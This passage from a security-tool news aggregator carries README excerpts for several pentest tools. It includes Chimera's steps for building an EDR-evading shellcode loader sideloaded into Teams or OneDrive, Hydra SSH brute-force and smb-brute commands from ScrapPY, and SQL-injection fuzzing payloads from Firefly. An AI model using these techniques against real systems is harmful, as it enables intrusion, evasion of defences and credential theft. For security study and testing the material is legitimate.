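For illustration, a minimal sketch of the XOR-with-random-key step just described (not Chimera's actual code):

# Hedged illustration of XOR encryption with a random key
# (not Chimera's actual code): encrypt raw shellcode before embedding it.
import os

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

shellcode = open("met.bin", "rb").read()  # raw payload, as in the usage examples below
key = os.urandom(16)                      # random per-build key
encrypted = xor(shellcode, key)           # the loader XORs again at runtime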

Dynamic syscalls from SysWhispers2 are also used, with a modified assembly version to evade the patterns that EDRs search for; random NOP sleds are added and registers are shuffled. Furthermore, Early Bird injection is used to inject the shellcode into another process, which the user can specify, together with sandbox-evasion mechanisms such as a hard-disk check and a check for whether the process is being debugged. Finally, a timing attack is placed in the loader, which uses waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options: either Microsoft Teams or Microsoft OneDrive.

You can create userenv.dll, a DLL that is missing from Microsoft Teams, and place it in the following folder:

%USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive the script uses version.dll, which is a common choice because it is missing from binaries such as onedriveupdater.exe.

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Useful Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project.Β 

Β 

Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary files.
  2. Open the folder and identify the following files: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_files" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_files" folder of the "chimera_automation" directory.
  7. Right-click on the "header_files" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.

Β 

Step 5:

  1. Right-click the assembly file β†’ Properties and choose the following:
     β€’ Exclude From Build β†’ No
     β€’ Content β†’ Yes
     β€’ Item Type β†’ Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project β†’ properties
  2. C/C++ Optimization and change to the following

Β 

Step 2: Remove Debug Information

  1. In Visual Studio choose Project β†’ properties
  2. Linker β†’ Debugging β†’ Generate Debug Info β†’ No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Artemis - APK Infrastructure Investigator

By: Zion3R β€” July 29th 2023 at 12:30

Overview

A tool for finding APK infrastructure.

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help      Display help
--path      Required: path of the APK file
--manifest  Display manifest information
--infra     Find all infra addresses (IP, domain), e.g. --infra ip,domain
--whoise    Whois lookup on all infra (IP, domain), e.g. --whoise ip,domain
--output    Set the output file, e.g. --output out.txt

Usage

Display Manifest

APK Infrastructure Investigator (3)

IP Whois

APK Infrastructure Investigator (4)

Example Usage:

1. Find infra (domain and IP) in sample4.apk and write the results to out.txt:

python3 main.py --path sample4.apk --infra domain,ip --output out.txt

2. Investigate the domains and IPs in the APK via whois:

python3 main.py --path sample.apk --whois ip


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R β€” July 14th 2023 at 12:30


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





☐ ☆ ✇ KitPloit - PenTest Tools!

ZeusCloud - Open Source Cloud Security

By: Zion3R — July 13th 2023 at 12:30


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach (see the sketch after this list).
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!
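
As a loose illustration of what a graph-backed "security as code" rule can look like, here is a hypothetical Python sketch that queries a Cartography-style neo4j asset graph for EC2 instances with public IP addresses. The node label, property names, connection details, and rule shape are assumptions for illustration, not ZeusCloud's actual rule API:

# Hypothetical rule sketch -- not ZeusCloud's actual rule engine or schema.
# Assumes a Cartography-style asset graph in neo4j with EC2Instance nodes.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
query = (
    "MATCH (i:EC2Instance) "
    "WHERE i.publicipaddress IS NOT NULL "
    "RETURN i.instanceid AS id, i.publicipaddress AS ip"
)
with driver.session() as session:
    for record in session.run(query):
        # Each hit is a candidate "publicly exposed instance" finding.
        print(f"exposed instance: {record['id']} ({record['ip']})")
driver.close()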

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on the frontend, make the code changes and save.

To develop on the backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



☐ ☆ ✇ KitPloit - PenTest Tools!

SOC-Multitool - A Powerful And User-Friendly Browser Extension That Streamlines Investigations For Security Professionals

By: Zion3R — July 6th 2023 at 12:30


Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more efficient. Now available on the Chrome Web Store and compatible with all Chromium-based browsers such as Microsoft Edge, Chrome, Brave, and Opera.


Streamline your investigations

SOC Multi-tool eliminates the need for constant copying and pasting during investigations. Simply highlight the text you want to investigate, right-click, and navigate to the type of data highlighted. The extension will then open new tabs with the results of your investigation.

Modern and feature-rich

The SOC Multi-tool is a modernized multi-tool built from the ground up, with a range of features and capabilities. Some of the key features include:

  • IP Reputation Lookup using VirusTotal & AbuseIPDB
  • IP Info Lookup using Tor relay checker & WHOIS
  • Hash Reputation Lookup using VirusTotal
  • Domain Reputation Lookup using VirusTotal & AbuseIPDB
  • Domain Info Lookup using Alienvault
  • Living off the land binaries Lookup using the LOLBas project
  • Decoding of Base64 & HEX using CyberChef
  • File Extension & Filename Lookup using fileinfo.com & File.net
  • MAC Address manufacturer Lookup using maclookup.com
  • Parsing of UserAgent using user-agents.net
  • Microsoft Error code Lookup using Microsoft's DB
  • Event ID Lookup (Windows, Sharepoint, SQL Server, Exchange, and Sysmon) using ultimatewindowssecurity.com
  • Blockchain Address Lookup using blockchain.com
  • CVE Info using cve.mitre.org

Easy to install

You can easily install the extension from the Chrome Web Store!
If you wish to make edits, you can download the source from the releases page, extract the folder, and make your changes.
To load your edited extension, turn on developer mode in your browser's extension settings, click "Load unpacked", and select the extracted folder!


SOC Multi-tool is a community-driven project and the developer encourages users to contribute and share better resources.



☐ ☆ ✇ KitPloit - PenTest Tools!

ScrapPY - A Python Utility For Scraping Manuals, Documents, And Other Sensitive PDFs To Generate Wordlists That Can Be Utilized By Offensive Security Tools

By: Zion3R — July 4th 2023 at 12:30


ScrapPY is a Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists that can be utilized by offensive security tools to perform brute force, forced browsing, and dictionary attacks. ScrapPY performs word frequency, entropy, and metadata analysis, and can run in full output modes to craft custom wordlists for targeted attacks. The tool dives deep to discover keywords and phrases leading to potential passwords or hidden directories, outputting to a text file that is readable by tools such as Hydra, Dirb, and Nmap. Expedite initial access, vulnerability discovery, and lateral movement with ScrapPY!


Install:

Download Repository:

$ mkdir ScrapPY
$ cd ScrapPY/
$ sudo git clone https://github.com/RoseSecurity/ScrapPY.git

Install Dependencies:

$ pip3 install -r requirements.txt

ScrapPY Usage:

usage: ScrapPY.py [-h] [-f FILE] [-m {word-frequency,full,metadata,entropy}] [-o OUTPUT]

Output metadata of document:

$ python3 ScrapPY.py -f example.pdf -m metadata

Output the top 100 most frequently used keywords to a file named Top_100_Keywords.txt:

$ python3 ScrapPY.py -f example.pdf -m word-frequency -o Top_100_Keywords.txt

Output all keywords to default ScrapPY.txt file:

$ python3 ScrapPY.py -f example.pdf

Output the top 100 keywords with the highest entropy rating:

$ python3 ScrapPY.py -f example.pdf -m entropy
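
To make the entropy mode concrete, here is a rough Python sketch of the underlying idea (Shannon-entropy ranking of extracted words); this is an illustration only, not ScrapPY's actual implementation, and example.txt is a placeholder input:

# Illustrative sketch of entropy-based keyword ranking, not ScrapPY's code.
import math
import re
from collections import Counter

def shannon_entropy(word: str) -> float:
    # Shannon entropy over the character distribution of the word.
    counts = Counter(word)
    total = len(word)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

text = open("example.txt", encoding="utf-8", errors="ignore").read()
words = set(re.findall(r"[A-Za-z0-9_\-]{4,}", text))
# High-entropy strings are more likely to be password- or token-like.
for word in sorted(words, key=shannon_entropy, reverse=True)[:100]:
    print(word)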

ScrapPY Output:

# ScrapPY writes ScrapPY.txt (or the specified output file) to the directory from which the tool was run. To view the first fifty lines of the file, run this command:

$ head -50 ScrapPY.txt

# To see how many words were generated, run this command:

$ wc -l ScrapPY.txt

Integration with Offensive Security Tools:

Easily integrate with tools such as Dirb to expedite the process of discovering hidden subdirectories:

root@RoseSecurity:~# dirb http://192.168.1.123/ /root/ScrapPY/ScrapPY.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.168.1.123/
WORDLIST_FILES: /root/ScrapPY/ScrapPY.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.1.123/ ----
==> DIRECTORY: http://192.168.1.123/vi/
+ http://192.168.1.123/programming (CODE:200|SIZE:2726)
+ http://192.168.1.123/s7-logic/ (CODE:403|SIZE:1122)
==> DIRECTORY: http://192.168.1.123/config/
==> DIRECTORY: http://192.168.1.123/docs/
==> DIRECTORY: http://192.168.1.123/external/

Utilize ScrapPY with Hydra for advanced brute force attacks:

root@RoseSecurity:~# hydra -l root -P /root/ScrapPY/ScrapPY.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22

Enhance Nmap scripts with ScrapPY wordlists:

nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=ScrapPY.txt 192.168.1.123

Future Development:

  • Allow for custom output file naming and increased verbosity
  • Integrate different modes of operation including word frequency analysis
  • Allow for metadata analysis
  • Search for high-entropy data
  • Search for path-like data
  • Implement image OCR to enumerate data from images in PDFs
  • Allow for processing of multiple PDFs


☐ ☆ ✇ KitPloit - PenTest Tools!

Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R — July 3rd 2023 at 12:30


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of AMSI as a loaded module, whether the process is running as 64-bit or 32-bit, as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section, which inspired me to build a tool to help me be more efficient during that activity. A special thanks goes out to ShadowKhan, who provided valuable feedback that helped shape the creative direction, making this utility visually appealing and enhancing its usability with suggested filtering capabilities.
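
For intuition, the amsi.dll check can be approximated in a few lines. The following Python sketch (using psutil on Windows) only illustrates the idea and is not Wanderer's C# implementation:

# Rough illustration, not Wanderer's code: list processes with amsi.dll loaded.
import psutil

for proc in psutil.process_iter(["pid", "name"]):
    try:
        # On Windows, memory_maps() includes the paths of loaded modules.
        modules = [m.path.lower() for m in proc.memory_maps()]
    except (psutil.AccessDenied, psutil.NoSuchProcess):
        continue  # comparable to Wanderer's access-denied filtering
    if any(path.endswith("amsi.dll") for path in modules):
        print(proc.info["pid"], proc.info["name"])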


Usage

PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module
--exclude-amsiunloaded, Exclude instances where amsi.dll is not a loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and process2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\> wanderer --all --exclude-64

Enumerate all processes where AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



☐ ☆ ✇ KitPloit - PenTest Tools!

Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R — June 21st 2023 at 12:30


This tool is very helpful for finding vulnerabilities present in web applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap, etc., in order to scan ports, sites, hosts, and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • The user has to run: python3 web_scan.py (https or http)://example.com
  • First, the program notes the initial run time, then it builds the URL as "www.example.com".
  • After this step, the system checks the internet connection using ping.
  • Functionalities:
    • To open the help menu, use --help; to update, use --update
    • To skip the current scan/test: CTRL+C
    • To quit the scanner: CTRL+Z
    • The program reports the scanning time taken by the tool for each specific test.

Phase 2

  • From here the main function of the scanner starts:
  • The scanner automatically selects a tool and begins scanning.
  • Scanners to be used and filename rotation (default: enabled (1))
  • The command used to initiate each tool (with its parameters and extra params) is already given in the code
  • After finding a vulnerability in the web application, the scanner classifies it in a specific format:
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c (critical) marks the most severe findings, whereas l (low) marks the least vulnerable systems

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict any information disclosure as far as possible.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical
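
The score-to-severity mapping above is straightforward to express in code. A small Python sketch of it (for illustration only; this helper is not part of the scanner itself):

# Map a CVSS v3 base score to the severity label used in advisories.
def cvss_severity(score: float) -> str:
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score >= 0.1:
        return "Low"
    return "Informational"

print(cvss_severity(7.5))  # -> High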

Vulnerabilities

  • After this, the scanner will show results, which include:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now the scanner will describe the harmful effects of that specific type of vulnerability.
  • The scanner points to sources (websites) to learn more about the vulnerabilities.
  • After this step, the scanner suggests some remedies to overcome the vulnerabilities.

Phase 3

  • The scanner will generate a proper report including:
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for the total scan
    • Details about each and every vulnerability
  • All scan output is written to SA-Debug-ScanLog in the same directory for debugging purposes
  • For debugging, you can view the complete output generated by all the tools in SA-Debug-ScanLog

Use

Run the program as: python3 web_scan.py (https or http)://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions, feature requests and bug reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub: @nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



☐ ☆ ✇ KitPloit - PenTest Tools!

Firefly - Black Box Fuzzer For Web Applications

By: Zion3R — June 17th 2023 at 12:30

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.


Advantages

  • Heavy use of goroutines and internal hardware for great performance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly customizable to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Built-in payloads (the default list is mixed with wordlists from SecLists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method does not work, try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the raw HTTP request and auto-detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

The request verifier is the most important part. This feature lets Firefly learn the core behavior of the target you fuzz. It's important to prefer quality over quantity: more verification requests lead to better-quality results, at the cost of performance (depending on your hardware).

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payloads can be highly customized, and with a good core wordlist it's possible to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List all available tampers

firefly -list-tamper

Tamper all payloads with a given type (more than one can be used, separated by commas)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

Hex encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The payloads ' or (1=1)-- - and " or(20=20)or " will result in ' or (13=(37-24))-- - and " or(13=(37-24))or ", where the => (with spaces) indicates the "replace to".
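
The same transformation can be reproduced with an ordinary regex substitution. The Python sketch below only demonstrates the documented behaviour (Firefly itself is written in Go):

import re

# Left-hand side of the rule is the pattern, right-hand side the replacement.
pattern, replacement = r"\([0-9]+=[0-9]+\)", "(13=(37-24))"
for payload in ["' or (1=1)-- -", '" or(20=20)or "']:
    # Every (N=N) group in the payload is replaced by the right-hand side.
    print(re.sub(pattern, replacement, payload))
# ' or (13=(37-24))-- -
# " or(13=(37-24))or "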

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Performance

Performance and time delay settings to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time delay in milliseconds (ms) for each concurrent thread

firefly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlists that contain the payloads can be added separately or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. The attack type depends on the filename suffix: <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlist names inside the folder wl:

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended, because you can use the jq tool to navigate through the results and compare them.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community is welcome to suggest new features, improvements, and/or new payloads for Firefly; just make a pull request or add a comment with your suggestions!



☐ ☆ ✇ KitPloit - PenTest Tools!

Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

By: Zion3R — June 13th 2023 at 12:30


burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

